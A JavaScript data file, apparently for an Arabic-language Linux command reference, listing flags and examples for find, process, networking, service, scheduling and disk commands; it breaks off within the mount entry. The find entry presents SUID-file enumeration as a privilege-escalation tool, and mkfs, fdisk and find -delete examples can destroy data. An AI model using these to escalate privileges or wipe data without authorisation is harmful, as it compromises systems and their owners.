{id:'find',name:'find',icon:'🔭',level:2,category:'البحث',
 desc:'ابحث عن الملفات حسب الاسم، النوع، الحجم، الوقت، والصلاحيات',
 syntax:'find [PATH] [OPTIONS] [EXPRESSION]',
 flags:[
   {flag:'-name PATTERN',desc:"ابحث حسب الاسم (مثال: '*.txt')"},
   {flag:'-iname',desc:'بحث الاسم بدون حساسية حروف'},
   {flag:'-type f',desc:'ملفات عادية فقط'},
   {flag:'-type d',desc:'مجلدات فقط'},
   {flag:'-type l',desc:'روابط رمزية فقط'},
   {flag:'-size +10M',desc:'ملفات أكبر من 10MB'},
   {flag:'-size -1k',desc:'ملفات أصغر من 1KB'},
   {flag:'-mtime -7',desc:'معدّل منذ أقل من 7 أيام'},
   {flag:'-atime +30',desc:'لم يُصل إليه منذ 30 يوماً'},
   {flag:'-user USER',desc:'مملوكة لمستخدم معين'},
   {flag:'-group GRP',desc:'تعود لمجموعة معينة'},
   {flag:'-perm 644',desc:'صلاحيات محددة'},
   {flag:'-perm /4000',desc:'ملفات SUID'},
   {flag:'-perm /2000',desc:'ملفات SGID'},
   {flag:'-empty',desc:'ملفات أو مجلدات فارغة'},
   {flag:'-exec CMD {} \\;',desc:'نفّذ أمراً على كل نتيجة'},
   {flag:'-exec CMD {} +',desc:'نفّذ أمراً على كل النتائج دفعة'},
   {flag:'-delete',desc:'احذف الملفات المُعثور عليها'},
   {flag:'-maxdepth N',desc:'حدد عمق البحث'},
   {flag:'-mindepth N',desc:'ابدأ البحث من عمق N'},
   {flag:'! / -not',desc:'انفِ الشرط التالي'},
   {flag:'-o',desc:'أو (OR) بين شرطين'},
   {flag:'-a',desc:'و (AND) بين شرطين (افتراضي)'},
 ],
 examples:[
   'find / -name "*.conf" -type f',
   'find /home -size +100M',
   'find /tmp -mtime +7 -delete',
   'find / -perm /4000 -type f 2>/dev/null',
   'find . -name "*.log" -exec grep -l "error" {} \\;',
   'find /var -user root -perm -o+w 2>/dev/null',
 ],
 note:'find / -perm /4000 يبحث عن ملفات SUID — أداة أساسية في Privilege Escalation!'
},
{id:'locate',name:'locate',icon:'⚡',level:2,category:'البحث',
 desc:'ابحث عن الملفات من قاعدة بيانات محدّثة (أسرع من find)',
 syntax:'locate [OPTIONS] PATTERN',
 flags:[
   {flag:'-i',desc:'بحث بدون حساسية حروف'},
   {flag:'-n N',desc:'أظهر فقط N نتيجة'},
   {flag:'-c',desc:'عدد النتائج فقط'},
   {flag:'-e',desc:'تحقق من وجود الملفات فعلاً'},
   {flag:'--regex',desc:'استخدم Regex'},
 ],
 examples:['locate passwd','locate -i "*.Conf"','updatedb && locate newfile'],
 note:'تحديث قاعدة البيانات: sudo updatedb. locate لا يرى الملفات الجديدة حتى التحديث.'
},
{id:'xargs',name:'xargs',icon:'⚙️',level:2,category:'البحث والنصوص',
 desc:'مرّر نتائج أمر كـ arguments لأمر آخر',
 syntax:'COMMAND | xargs [OPTIONS] [CMD]',
 flags:[
   {flag:'-n N',desc:'مرّر N وسيطة في كل مرة'},
   {flag:'-I {}',desc:'استبدل {} بالمدخل'},
   {flag:'-P N',desc:'شغّل N عملية بالتوازي'},
   {flag:'-0',desc:'استخدم null كفاصل (مع find -print0)'},
   {flag:'-t',desc:'اعرض الأمر قبل تنفيذه'},
   {flag:'-p',desc:'اسأل قبل التنفيذ'},
 ],
 examples:[
   'find . -name "*.tmp" | xargs rm',
   'find . -name "*.txt" -print0 | xargs -0 grep "error"',
   'cat urls.txt | xargs -n1 -P5 curl -O',
   'ls *.jpg | xargs -I{} convert {} {}.png',
 ],
},
{id:'tee',name:'tee',icon:'🔀',level:2,category:'الإدخال/الإخراج',
 desc:'اكتب الإدخال لملف وأخرجه في نفس الوقت (T-pipe)',
 syntax:'COMMAND | tee [OPTIONS] FILE',
 flags:[
   {flag:'-a',desc:'أضف للملف بدل الكتابة فوقه'},
   {flag:'-i',desc:'تجاهل Interrupt signals'},
 ],
 examples:[
   'ls -la | tee output.txt',
   'apt install nginx 2>&1 | tee install.log',
   'ping google.com | tee -a ping.log',
 ],
},
// --- Processes ---
{id:'ps',name:'ps',icon:'⚙️',level:2,category:'العمليات',
 desc:'اعرض العمليات الجارية حالياً (Process Status)',
 syntax:'ps [OPTIONS]',
 flags:[
   {flag:'aux',desc:'اعرض كل العمليات لكل المستخدمين (بصيغة BSD)'},
   {flag:'-ef',desc:'اعرض كل العمليات بصيغة UNIX كاملة'},
   {flag:'-u USER',desc:'عمليات مستخدم محدد'},
   {flag:'-p PID',desc:'عملية بـ PID محدد'},
   {flag:'--forest',desc:'اعرض شجرة العمليات'},
   {flag:'-o FORMAT',desc:'حدد الأعمدة المعروضة'},
   {flag:'f',desc:'اعرض شجرة العمليات (BSD)'},
 ],
 examples:[
   'ps aux',
   'ps -ef | grep nginx',
   'ps aux --sort=-%cpu | head -10',
   'ps -eo pid,ppid,cmd,%mem,%cpu --sort=-%cpu',
 ],
},
{id:'top',name:'top',icon:'📊',level:2,category:'العمليات',
 desc:'مراقبة العمليات والموارد في الوقت الحقيقي',
 syntax:'top [OPTIONS]',
 flags:[
   {flag:'-u USER',desc:'اعرض عمليات مستخدم محدد فقط'},
   {flag:'-p PID',desc:'راقب عملية محددة'},
   {flag:'-d N',desc:'تحديث كل N ثانية'},
   {flag:'-n N',desc:'تحديث N مرة ثم اخرج'},
   {flag:'-b',desc:'وضع الدُفعات (batch) للتحويل لملف'},
   {flag:'داخل top: k',desc:'اقتل عملية'},
   {flag:'داخل top: r',desc:'غيّر أولوية عملية (renice)'},
   {flag:'داخل top: h',desc:'مساعدة'},
   {flag:'داخل top: M',desc:'رتّب حسب الذاكرة'},
   {flag:'داخل top: P',desc:'رتّب حسب CPU'},
   {flag:'داخل top: q',desc:'اخرج'},
 ],
 examples:[
   'top',
   'top -u www-data',
   'top -bn1 | head -20',
 ],
 note:'htop أفضل وأجمل من top — جرّبه إن كان مثبتاً!'
},
{id:'kill',name:'kill',icon:'💀',level:2,category:'العمليات',
 desc:'أرسل إشارة لعملية (افتراضياً SIGTERM لإنهائها)',
 syntax:'kill [OPTIONS] PID',
 flags:[
   {flag:'-9 / SIGKILL',desc:'أنهِ العملية فوراً (لا يمكن تجاهله)'},
   {flag:'-15 / SIGTERM',desc:'أنهِ بشكل نظيف (افتراضي)'},
   {flag:'-1 / SIGHUP',desc:'أعد تحميل الضبط'},
   {flag:'-2 / SIGINT',desc:'اقطع (مثل Ctrl+C)'},
   {flag:'-18 / SIGCONT',desc:'استمر عملية موقوفة'},
   {flag:'-19 / SIGSTOP',desc:'أوقف عملية مؤقتاً'},
   {flag:'-l',desc:'اعرض قائمة الإشارات'},
 ],
 examples:[
   'kill 1234',
   'kill -9 5678',
   'kill -HUP $(cat /var/run/nginx.pid)',
   'kill -l',
 ],
},
{id:'killall',name:'killall',icon:'💣',level:2,category:'العمليات',
 desc:'أنهِ كل العمليات باسمها',
 syntax:'killall [OPTIONS] PROCESS_NAME',
 flags:[
   {flag:'-9',desc:'SIGKILL قوي'},
   {flag:'-i',desc:'اسأل قبل القتل'},
   {flag:'-u USER',desc:'فقط عمليات مستخدم محدد'},
   {flag:'-v',desc:'اعرض ما تم إنهاؤه'},
 ],
 examples:['killall firefox','killall -9 nginx','killall -u alice python'],
},
{id:'pkill',name:'pkill',icon:'🎯',level:2,category:'العمليات',
 desc:'أنهِ العمليات بنمط اسم أو معيار',
 syntax:'pkill [OPTIONS] PATTERN',
 flags:[
   {flag:'-u USER',desc:'عمليات مستخدم محدد'},
   {flag:'-9',desc:'SIGKILL'},
   {flag:'-f',desc:'ابحث في سطر الأمر الكامل'},
 ],
 examples:['pkill firefox','pkill -u bob','pkill -9 -f "python app.py"'],
},
{id:'pgrep',name:'pgrep',icon:'🔍',level:2,category:'العمليات',
 desc:'ابحث عن PID العمليات بالاسم',
 syntax:'pgrep [OPTIONS] PATTERN',
 flags:[
   {flag:'-l',desc:'اعرض الاسم مع الـ PID'},
   {flag:'-a',desc:'اعرض الأمر الكامل'},
   {flag:'-u USER',desc:'عمليات مستخدم محدد'},
   {flag:'-x',desc:'تطابق الاسم تماماً'},
 ],
 examples:['pgrep nginx','pgrep -l ssh','pgrep -u root python'],
},
{id:'nice',name:'nice',icon:'🎚️',level:2,category:'العمليات',
 desc:'شغّل أمراً بأولوية معينة (Nice value)',
 syntax:'nice -n VALUE COMMAND',
 flags:[
   {flag:'-n N',desc:'القيمة من -20 (أعلى أولوية) إلى 19 (أدنى)'},
 ],
 examples:['nice -n 10 tar -czf backup.tar /data','nice -n -5 critical_process'],
},
{id:'renice',name:'renice',icon:'🔧',level:2,category:'العمليات',
 desc:'غيّر أولوية عملية تعمل حالياً',
 syntax:'renice -n VALUE -p PID',
 flags:[
   {flag:'-n N',desc:'القيمة الجديدة'},
   {flag:'-p PID',desc:'رقم العملية'},
   {flag:'-u USER',desc:'كل عمليات مستخدم'},
 ],
 examples:['renice -n 10 -p 1234','renice -n 5 -u username'],
},
{id:'jobs',name:'jobs',icon:'📋',level:2,category:'العمليات',
 desc:'اعرض العمليات في الخلفية والمقدمة',
 syntax:'jobs [OPTIONS]',
 flags:[
   {flag:'-l',desc:'اعرض PID أيضاً'},
   {flag:'-p',desc:'اعرض PID فقط'},
 ],
 examples:['jobs','jobs -l'],
},
{id:'bg',name:'bg',icon:'⬇️',level:2,category:'العمليات',
 desc:'أرسل عملية موقوفة للخلفية',
 syntax:'bg [JOB_ID]',
 flags:[],
 examples:['bg','bg %2'],
 note:'Ctrl+Z يوقف العملية، ثم bg لإرسالها للخلفية.'
},
{id:'fg',name:'fg',icon:'⬆️',level:2,category:'العمليات',
 desc:'استرجع عملية من الخلفية للمقدمة',
 syntax:'fg [JOB_ID]',
 flags:[],
 examples:['fg','fg %2'],
},
{id:'nohup',name:'nohup',icon:'🛡️',level:2,category:'العمليات',
 desc:'شغّل أمراً يبقى بعد الخروج من الجلسة (No Hang Up)',
 syntax:'nohup COMMAND [ARGS] &',
 flags:[],
 examples:['nohup python server.py &','nohup ./backup.sh > backup.log 2>&1 &'],
 note:'مخرجات nohup تذهب لملف nohup.out تلقائياً.'
},
// --- Networking ---
{id:'ip',name:'ip',icon:'🌐',level:2,category:'الشبكات',
 desc:'إدارة عناوين IP والواجهات والمسارات (يحل محل ifconfig)',
 syntax:'ip [OPTIONS] OBJECT COMMAND',
 flags:[
   {flag:'ip addr show',desc:'اعرض عناوين IP لكل الواجهات'},
   {flag:'ip link show',desc:'اعرض حالة الواجهات (up/down)'},
   {flag:'ip route show',desc:'اعرض جدول التوجيه'},
   {flag:'ip addr add IP/PREFIX dev ETH',desc:'أضف عنوان IP لواجهة'},
   {flag:'ip addr del IP/PREFIX dev ETH',desc:'احذف عنوان IP'},
   {flag:'ip link set ETH up/down',desc:'شغّل/أوقف واجهة شبكية'},
   {flag:'ip route add default via GW',desc:'أضف بوابة افتراضية'},
   {flag:'ip neigh show',desc:'جدول ARP'},
   {flag:'-4',desc:'IPv4 فقط'},
   {flag:'-6',desc:'IPv6 فقط'},
   {flag:'-brief / -b',desc:'عرض مختصر'},
 ],
 examples:[
   'ip addr show',
   'ip addr show eth0',
   'ip addr add 192.168.1.100/24 dev eth0',
   'ip link set eth0 up',
   'ip route show',
   'ip route add default via 192.168.1.1',
 ],
},
{id:'ping',name:'ping',icon:'📡',level:2,category:'الشبكات',
 desc:'اختبر الاتصال بجهاز عن بُعد عبر ICMP',
 syntax:'ping [OPTIONS] HOST',
 flags:[
   {flag:'-c N',desc:'أرسل N حزمة فقط ثم توقف'},
   {flag:'-i N',desc:'الفاصل بين الحزم بالثواني'},
   {flag:'-t TTL',desc:'حدد Time To Live'},
   {flag:'-s SIZE',desc:'حجم الحزمة بالبايت'},
   {flag:'-W N',desc:'انتظر N ثانية للرد'},
   {flag:'-q',desc:'اعرض فقط الملخص'},
   {flag:'-4',desc:'استخدم IPv4'},
   {flag:'-6',desc:'استخدم IPv6'},
 ],
 examples:[
   'ping google.com',
   'ping -c 4 8.8.8.8',
   'ping -c 3 -i 0.5 192.168.1.1',
 ],
},
{id:'ss',name:'ss',icon:'🔌',level:2,category:'الشبكات',
 desc:'اعرض معلومات المقابس والاتصالات الشبكية (يحل محل netstat)',
 syntax:'ss [OPTIONS] [FILTER]',
 flags:[
   {flag:'-t',desc:'TCP فقط'},
   {flag:'-u',desc:'UDP فقط'},
   {flag:'-l',desc:'المقابس التي تستمع (Listening)'},
   {flag:'-n',desc:'لا تحوّل الأرقام لأسماء'},
   {flag:'-p',desc:'اعرض العملية المالكة للمقبس'},
   {flag:'-a',desc:'كل المقابس (مستمعة + متصلة)'},
   {flag:'-4',desc:'IPv4 فقط'},
   {flag:'-6',desc:'IPv6 فقط'},
   {flag:'-s',desc:'إحصائيات مختصرة'},
   {flag:'-e',desc:'معلومات إضافية (user, inode)'},
   {flag:'state FILTER',desc:'فلتر بالحالة (established, listen...)'},
 ],
 examples:[
   'ss -tlnp',
   'ss -anp | grep :80',
   'ss -s',
   'ss -tnp state established',
 ],
 note:'ss -tlnp هو الأمر الأكثر استخداماً لمعرفة المنافذ المفتوحة.'
},
{id:'netstat',name:'netstat',icon:'📊',level:2,category:'الشبكات',
 desc:'إحصائيات الشبكة والاتصالات (قديم، ss أفضل)',
 syntax:'netstat [OPTIONS]',
 flags:[
   {flag:'-t',desc:'TCP'},
   {flag:'-u',desc:'UDP'},
   {flag:'-l',desc:'المستمع فقط'},
   {flag:'-n',desc:'أرقام بدل أسماء'},
   {flag:'-p',desc:'العملية المرتبطة'},
   {flag:'-r',desc:'جدول التوجيه'},
   {flag:'-i',desc:'إحصائيات الواجهات'},
   {flag:'-s',desc:'إحصائيات البروتوكولات'},
 ],
 examples:['netstat -tlnp','netstat -an | grep :22','netstat -rn'],
},
{id:'curl',name:'curl',icon:'🌍',level:2,category:'الشبكات',
 desc:'نقل البيانات عبر HTTP/S وبروتوكولات أخرى (Client URL)',
 syntax:'curl [OPTIONS] URL',
 flags:[
   {flag:'-o FILE',desc:'احفظ الإخراج في ملف'},
   {flag:'-O',desc:'احفظ الملف باسمه الأصلي'},
   {flag:'-L',desc:'تابع التحويلات (redirects)'},
   {flag:'-I',desc:'اعرض الترويسات (Headers) فقط'},
   {flag:'-H "Header"',desc:'أضف ترويسة مخصصة'},
   {flag:'-X METHOD',desc:'حدد طريقة HTTP (GET,POST,PUT...)'},
   {flag:'-d DATA',desc:'أرسل بيانات في طلب POST'},
   {flag:'-u USER:PASS',desc:'مصادقة أساسية'},
   {flag:'-k',desc:'تجاهل أخطاء شهادة SSL'},
   {flag:'-v',desc:'وضع التشخيص (Verbose)'},
   {flag:'-s',desc:'صامت — لا رسائل تقدم'},
   {flag:'-w FORMAT',desc:'اعرض معلومات مخصصة بعد الطلب'},
   {flag:'--cookie',desc:'أرسل Cookies'},
   {flag:'--proxy URL',desc:'استخدم Proxy'},
   {flag:'-A "Agent"',desc:'حدد User-Agent'},
   {flag:'--limit-rate',desc:'حدد سرعة التنزيل'},
 ],
 examples:[
   'curl https://example.com',
   'curl -O https://example.com/file.zip',
   'curl -I https://google.com',
   "curl -X POST -H 'Content-Type: application/json' -d '{\"key\":\"val\"}' https://api.example.com/data",
   'curl -u admin:pass https://api.internal/v1/users',
   'curl -v -k https://self-signed.example.com',
 ],
},
{id:'wget',name:'wget',icon:'⬇️',level:2,category:'الشبكات',
 desc:'تنزيل الملفات من الإنترنت (Web Get)',
 syntax:'wget [OPTIONS] URL',
 flags:[
   {flag:'-O FILE',desc:'احفظ باسم محدد'},
   {flag:'-c',desc:'تابع تنزيلاً منقطعاً'},
   {flag:'-r',desc:'تنزيل تكراري (موقع كامل)'},
   {flag:'-q',desc:'صامت'},
   {flag:'-P DIR',desc:'احفظ في مجلد محدد'},
   {flag:'--limit-rate',desc:'حدد السرعة (مثلاً 1M)'},
   {flag:'--no-check-certificate',desc:'تجاهل أخطاء SSL'},
   {flag:'-i FILE',desc:'نزّل روابط من ملف'},
   {flag:'--spider',desc:'تحقق من الرابط بدون تنزيل'},
 ],
 examples:[
   'wget https://example.com/file.iso',
   'wget -c https://example.com/bigfile.iso',
   'wget -r -l 2 https://example.com/',
   'wget -q -O- https://api.example.com/status',
 ],
},
{id:'ssh',name:'ssh',icon:'🔒',level:2,category:'الاتصال البعيد',
 desc:'اتصال آمن مشفر بجهاز بعيد (Secure Shell)',
 syntax:'ssh [OPTIONS] USER@HOST',
 flags:[
   {flag:'-p PORT',desc:'حدد منفذاً مختلفاً (افتراضي 22)'},
   {flag:'-i KEY',desc:'حدد ملف المفتاح الخاص'},
   {flag:'-L LOCAL:HOST:REMOTE',desc:'محلي Port Forwarding'},
   {flag:'-R REMOTE:HOST:LOCAL',desc:'بعيد Port Forwarding'},
   {flag:'-D PORT',desc:'SOCKS Proxy ديناميكي'},
   {flag:'-X',desc:'تمكين X11 Forwarding (واجهات رسومية)'},
   {flag:'-N',desc:'لا تُنفّذ أوامر (فقط forwarding)'},
   {flag:'-v',desc:'وضع التشخيص'},
   {flag:'-C',desc:'ضغط البيانات'},
   {flag:'-J HOST',desc:'اقفز عبر Jump Host'},
   {flag:'-o OPT=VAL',desc:'خيارات إضافية من ssh_config'},
 ],
 examples:[
   'ssh user@192.168.1.100',
   'ssh -p 2222 admin@server.com',
   'ssh -i ~/.ssh/mykey.pem ubuntu@ec2-host.aws.com',
   'ssh -L 8080:localhost:80 user@remote',
   'ssh -D 1080 user@remote',
 ],
 note:'ssh-keygen لإنشاء مفاتيح. ssh-copy-id لنسخ المفتاح للخادم البعيد.'
},
{id:'scp',name:'scp',icon:'📦',level:2,category:'الاتصال البعيد',
 desc:'نسخ الملفات بشكل آمن عبر SSH (Secure Copy)',
 syntax:'scp [OPTIONS] SOURCE DEST',
 flags:[
   {flag:'-r',desc:'نسخ تكراري للمجلدات'},
   {flag:'-P PORT',desc:'منفذ مخصص'},
   {flag:'-i KEY',desc:'ملف المفتاح الخاص'},
   {flag:'-C',desc:'ضغط'},
   {flag:'-v',desc:'تشخيص'},
 ],
 examples:[
   'scp file.txt user@remote:/tmp/',
   'scp -r /local/dir user@remote:~/',
   'scp user@remote:/etc/config.conf ./backup/',
 ],
},
{id:'rsync',name:'rsync',icon:'🔄',level:2,category:'الاتصال البعيد',
 desc:'مزامنة الملفات بكفاءة محلياً أو عبر SSH',
 syntax:'rsync [OPTIONS] SOURCE DEST',
 flags:[
   {flag:'-a',desc:'Archive mode (يشمل -r -l -p -t -g -o)'},
   {flag:'-v',desc:'Verbose'},
   {flag:'-z',desc:'ضغط أثناء النقل'},
   {flag:'-P',desc:'أظهر التقدم وتابع الانتقال المنقطع'},
   {flag:'-n / --dry-run',desc:'محاكاة بدون تنفيذ فعلي'},
   {flag:'--delete',desc:'احذف الملفات في الوجهة غير الموجودة في المصدر'},
   {flag:'--exclude',desc:"استثنِ نمطاً (مثلاً --exclude='*.log')"},
   {flag:'-e ssh',desc:'استخدم SSH كوسيط'},
   {flag:'--bwlimit=N',desc:'حدد السرعة بـ KB/s'},
   {flag:'--checksum',desc:'قارن بالـ Checksum لا بالوقت والحجم'},
 ],
 examples:[
   'rsync -av /source/ /dest/',
   'rsync -avz /local/ user@remote:/backup/',
   'rsync -avPn --delete /home/ /backup/home/',
 ],
 note:'rsync يرسل فقط ما تغيّر — أسرع وأذكى من cp للنسخ الاحتياطي!'
},
{id:'traceroute',name:'traceroute',icon:'🗺️',level:2,category:'الشبكات',
 desc:'تتبع مسار الحزم عبر الشبكة حتى الوجهة',
 syntax:'traceroute [OPTIONS] HOST',
 flags:[
   {flag:'-n',desc:'لا تحوّل IP لأسماء (أسرع)'},
   {flag:'-m N',desc:'حد أقصى N قفزة (افتراضي 30)'},
   {flag:'-p PORT',desc:'حدد المنفذ'},
   {flag:'-I',desc:'استخدم ICMP بدل UDP'},
   {flag:'-T',desc:'استخدم TCP SYN'},
 ],
 examples:['traceroute google.com','traceroute -n 8.8.8.8','traceroute -T -p 80 server.com'],
},
{id:'nslookup',name:'nslookup',icon:'🔎',level:2,category:'الشبكات',
 desc:'استعلام عن DNS واستيضاح أسماء النطاقات',
 syntax:'nslookup [HOST] [SERVER]',
 flags:[],
 examples:['nslookup google.com','nslookup 8.8.8.8','nslookup example.com 8.8.8.8'],
},
{id:'dig',name:'dig',icon:'⛏️',level:2,category:'الشبكات',
 desc:'استعلام DNS متقدم ومفصّل (Domain Information Groper)',
 syntax:'dig [OPTIONS] [NAME] [TYPE]',
 flags:[
   {flag:'+short',desc:'نتيجة موجزة فقط'},
   {flag:'+noall +answer',desc:'الإجابة فقط'},
   {flag:'-t TYPE',desc:'نوع السجل (A, MX, NS, TXT, CNAME...)'},
   {flag:'-x IP',desc:'Reverse DNS lookup'},
   {flag:'@SERVER',desc:'استعلم من DNS سيرفر محدد'},
   {flag:'+trace',desc:'تتبع الاستعلام من الجذر'},
 ],
 examples:[
   'dig google.com',
   'dig +short example.com A',
   'dig -t MX gmail.com',
   'dig -x 8.8.8.8',
   'dig @8.8.8.8 example.com',
 ],
},

// ╔══════════════════════════════════════════════╗
// ║  LEVEL 3 — ADVANCED (إدارة النظام)          ║
// ╚══════════════════════════════════════════════╝
{id:'systemctl',name:'systemctl',icon:'⚙️',level:3,category:'الخدمات',
 desc:'إدارة خدمات Systemd (تشغيل، إيقاف، تفعيل، تشخيص)',
 syntax:'systemctl [OPTIONS] COMMAND [UNIT]',
 flags:[
   {flag:'start UNIT',desc:'شغّل الخدمة'},
   {flag:'stop UNIT',desc:'أوقف الخدمة'},
   {flag:'restart UNIT',desc:'أعد تشغيل الخدمة'},
   {flag:'reload UNIT',desc:'أعد تحميل الضبط بدون إعادة تشغيل'},
   {flag:'enable UNIT',desc:'فعّل التشغيل التلقائي عند الإقلاع'},
   {flag:'disable UNIT',desc:'ألغِ التشغيل التلقائي'},
   {flag:'status UNIT',desc:'اعرض حالة الخدمة'},
   {flag:'is-active UNIT',desc:'هل تعمل؟'},
   {flag:'is-enabled UNIT',desc:'هل هي مفعّلة؟'},
   {flag:'is-failed UNIT',desc:'هل فشلت؟'},
   {flag:'list-units',desc:'اعرض كل الوحدات النشطة'},
   {flag:'list-unit-files',desc:'اعرض كل ملفات الوحدات'},
   {flag:'daemon-reload',desc:'أعد تحميل Systemd بعد تغيير ملفات الوحدات'},
   {flag:'mask UNIT',desc:'منع الخدمة من التشغيل نهائياً'},
   {flag:'unmask UNIT',desc:'إلغاء الـ mask'},
   {flag:'edit UNIT',desc:'عدّل ملف الوحدة'},
   {flag:'cat UNIT',desc:'اعرض ملف الوحدة'},
   {flag:'poweroff',desc:'أوقف النظام'},
   {flag:'reboot',desc:'أعد التشغيل'},
 ],
 examples:[
   'systemctl start nginx',
   'systemctl enable --now sshd',
   'systemctl status firewalld',
   'systemctl list-units --type=service --state=running',
   'systemctl daemon-reload',
 ],
 note:'systemctl enable --now يفعّل ويشغّل في نفس الوقت!'
},
{id:'journalctl',name:'journalctl',icon:'📋',level:3,category:'الخدمات',
 desc:'عرض وتحليل سجلات Systemd Journal',
 syntax:'journalctl [OPTIONS]',
 flags:[
   {flag:'-u UNIT',desc:'سجلات خدمة محددة'},
   {flag:'-f',desc:'تابع السجلات الجديدة (مثل tail -f)'},
   {flag:'-n N',desc:'آخر N سطر'},
   {flag:'-p PRIORITY',desc:'مستوى الأهمية (err, warning, info, debug)'},
   {flag:'--since "DATE"',desc:'منذ تاريخ محدد'},
   {flag:'--until "DATE"',desc:'حتى تاريخ محدد'},
   {flag:'-b',desc:'سجلات الإقلاع الحالي'},
   {flag:'-b -1',desc:'سجلات الإقلاع السابق'},
   {flag:'--disk-usage',desc:'حجم السجلات على القرص'},
   {flag:'--vacuum-size=SIZE',desc:'احذف السجلات القديمة حتى يصل الحجم'},
   {flag:'-x',desc:'أضف شرحاً للأخطاء'},
   {flag:'--no-pager',desc:'اعرض مباشرة بدون pager'},
   {flag:'-o json',desc:'إخراج بصيغة JSON'},
   {flag:'_PID=N',desc:'سجلات عملية محددة'},
 ],
 examples:[
   'journalctl -u sshd',
   'journalctl -f',
   'journalctl -p err -b',
   'journalctl --since "2024-01-01" --until "2024-01-02"',
   'journalctl -u nginx -n 50 --no-pager',
 ],
},
{id:'cron',name:'crontab',icon:'⏰',level:3,category:'الجدولة',
 desc:'جدولة المهام التلقائية (Cron Jobs)',
 syntax:'crontab [OPTIONS]',
 flags:[
   {flag:'-e',desc:'عدّل ملف crontab للمستخدم الحالي'},
   {flag:'-l',desc:'اعرض المهام المجدولة'},
   {flag:'-r',desc:'احذف كل المهام المجدولة'},
   {flag:'-u USER',desc:'مهام مستخدم محدد (root فقط)'},
   {flag:'* * * * *',desc:'كل دقيقة (دقيقة ساعة يوم شهر يوم-أسبوع)'},
   {flag:'0 2 * * *',desc:'يومياً الساعة 2 صباحاً'},
   {flag:'0 * * * *',desc:'كل ساعة'},
   {flag:'*/5 * * * *',desc:'كل 5 دقائق'},
   {flag:'0 0 * * 0',desc:'كل أحد منتصف الليل'},
   {flag:'@reboot',desc:'عند كل إقلاع للنظام'},
   {flag:'@daily',desc:'يومياً'},
 ],
 examples:[
   'crontab -l',
   'crontab -e',
   '0 3 * * * /usr/bin/backup.sh >> /var/log/backup.log 2>&1',
   '*/15 * * * * /usr/bin/check_disk.sh',
 ],
 note:'تحقق من ملف /var/log/cron أو journalctl لمتابعة تنفيذ المهام.'
},
{id:'at',name:'at',icon:'📅',level:3,category:'الجدولة',
 desc:'جدّل تنفيذ أمر في وقت محدد (مرة واحدة)',
 syntax:'at [OPTIONS] TIME',
 flags:[
   {flag:'-l',desc:'اعرض المهام المعلقة (atq)'},
   {flag:'-d N',desc:'احذف المهمة رقم N (atrm)'},
   {flag:'-f FILE',desc:'نفّذ الأوامر من ملف'},
   {flag:'-m',desc:'أرسل بريداً عند الانتهاء'},
 ],
 examples:[
   "echo 'systemctl restart nginx' | at 02:00",
   "at now + 5 minutes",
   "at 14:30 tomorrow",
   'atq',
 ],
},
{id:'df',name:'df',icon:'💾',level:3,category:'التخزين',
 desc:'اعرض مساحة الأقراص والأقسام المستخدمة',
 syntax:'df [OPTIONS] [PATH]',
 flags:[
   {flag:'-h',desc:'حجم مقروء (K,M,G)'},
   {flag:'-T',desc:'اعرض نوع نظام الملفات'},
   {flag:'-i',desc:'اعرض inodes بدل المساحة'},
   {flag:'-a',desc:'اعرض كل أنظمة الملفات'},
   {flag:'-x TYPE',desc:'استثنِ نوعاً معيناً'},
   {flag:'--total',desc:'أضف سطراً للإجمالي'},
 ],
 examples:['df -h','df -Th','df -h /home','df -i','df -h --total'],
},
{id:'du',name:'du',icon:'📦',level:3,category:'التخزين',
 desc:'احسب حجم الملفات والمجلدات',
 syntax:'du [OPTIONS] [PATH]',
 flags:[
   {flag:'-h',desc:'حجم مقروء'},
   {flag:'-s',desc:'إجمالي المجلد فقط'},
   {flag:'-a',desc:'اعرض حجم كل ملف'},
   {flag:'-c',desc:'أضف إجمالياً في النهاية'},
   {flag:'--max-depth=N',desc:'حد العمق'},
   {flag:'-x',desc:'لا تخرج عن نظام الملفات الحالي'},
 ],
 examples:[
   'du -sh /var/',
   'du -sh * | sort -rh | head -10',
   'du -ah --max-depth=2 /home/',
 ],
},
{id:'lsblk',name:'lsblk',icon:'💿',level:3,category:'التخزين',
 desc:'اعرض الأجهزة وأقسامها بصيغة شجرية',
 syntax:'lsblk [OPTIONS]',
 flags:[
   {flag:'-a',desc:'اعرض كل الأجهزة'},
   {flag:'-f',desc:'اعرض نوع نظام الملفات والـ UUID'},
   {flag:'-l',desc:'عرض قائمي لا شجري'},
   {flag:'-d',desc:'الأجهزة فقط بدون أقسام'},
   {flag:'-o NAME,SIZE,TYPE,MOUNTPOINT',desc:'حدد الأعمدة'},
 ],
 examples:['lsblk','lsblk -f','lsblk -o NAME,SIZE,FSTYPE,MOUNTPOINT'],
},
{id:'fdisk',name:'fdisk',icon:'🖧',level:3,category:'التخزين',
 desc:'إنشاء وتعديل وحذف أقسام القرص (MBR)',
 syntax:'fdisk [OPTIONS] DEVICE',
 flags:[
   {flag:'-l',desc:'اعرض قائمة الأقسام لجميع الأجهزة'},
   {flag:'-l DEVICE',desc:'أقسام جهاز محدد'},
   {flag:'داخل fdisk: n',desc:'قسم جديد'},
   {flag:'داخل fdisk: d',desc:'احذف قسماً'},
   {flag:'داخل fdisk: p',desc:'اعرض الأقسام'},
   {flag:'داخل fdisk: w',desc:'احفظ وأخرج'},
   {flag:'داخل fdisk: q',desc:'اخرج بدون حفظ'},
   {flag:'داخل fdisk: t',desc:'غيّر نوع القسم'},
 ],
 examples:['fdisk -l','fdisk /dev/sdb'],
 note:'⚠️ احذر! fdisk يمكن أن يدمر بياناتك. استخدم parted أو gdisk لـ GPT.'
},
{id:'mkfs',name:'mkfs',icon:'💾',level:3,category:'التخزين',
 desc:'أنشئ نظام ملفات على قسم (Format)',
 syntax:'mkfs [OPTIONS] DEVICE',
 flags:[
   {flag:'-t TYPE',desc:'نوع نظام الملفات (ext4, xfs, vfat...)'},
   {flag:'mkfs.ext4',desc:'اختصار للصيغة ext4'},
   {flag:'mkfs.xfs',desc:'اختصار للصيغة xfs'},
   {flag:'-L LABEL',desc:'حدد تسمية القسم'},
 ],
 examples:['mkfs.ext4 /dev/sdb1','mkfs -t xfs /dev/sdc1','mkfs.ext4 -L DataDisk /dev/sdb1'],
 note:'⚠️ هذا الأمر يحذف كل البيانات الموجودة على القسم!'
},
{id:'mount',name:'mount',icon:'🔗',level:3,category:'التخزين',
 desc:'وصّل نظام ملفات لشجرة المجلدات',
 syntax:'mount [OPTIONS] DEVICE MOUNTPOINT',
 flags:[
   {flag:'-t TYPE',desc:'حدد نوع نظام الملفات'},
